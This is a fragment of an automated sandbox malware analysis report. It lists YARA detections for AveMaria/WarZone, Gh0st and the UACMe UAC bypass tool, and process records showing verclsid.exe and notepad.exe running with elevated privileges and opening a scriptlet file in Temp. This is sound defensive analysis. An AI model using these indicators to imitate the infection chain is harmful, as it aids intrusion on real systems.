                                          • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, Author: Joe Security

                                          General

                                          Start time:21:17:43
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\verclsid.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                          Imagebase:0xffeb0000
                                          File size:11776 bytes
                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:21:17:45
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\notepad.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
                                          Imagebase:0xff7a0000
                                          File size:193536 bytes
                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Disassembly

                                          Code Analysis

                                          Reset < >